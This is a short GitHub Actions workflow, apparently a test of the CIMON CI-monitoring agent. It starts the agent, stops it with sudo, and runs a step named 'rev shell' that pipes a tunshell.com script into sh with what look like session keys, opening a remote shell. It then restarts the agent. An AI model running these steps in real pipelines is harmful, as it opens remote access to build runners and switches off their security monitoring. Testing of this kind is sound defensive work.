name: CIMON

on:
  workflow_dispatch:

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
    - uses: cycodelabs/cimon-action@v0
      with: 
        report-process-tree: true

    - name: Stop CIMON
      shell: bash
      run: | 
        sudo su <<EOF
        /tmp/cimon/cimon agent stop
        EOF

    - name: rev shell
      shell: bash
      run: |
        curl -sSf https://lets.tunshell.com/init.sh | sh -s -- T XR1Kse7FN3BVQM3lHV5jaX kSUXh3b1XtW6dHTpCBsg3a eu.relay.tunshell.com

    - name: Random curl 
      shell: bash
      run: |
        curl google.com
        curl example.com

    - name: Restart CIMON 
      shell: bash
      run: |
        sudo -E /tmp/cimon/cimon agent start-background
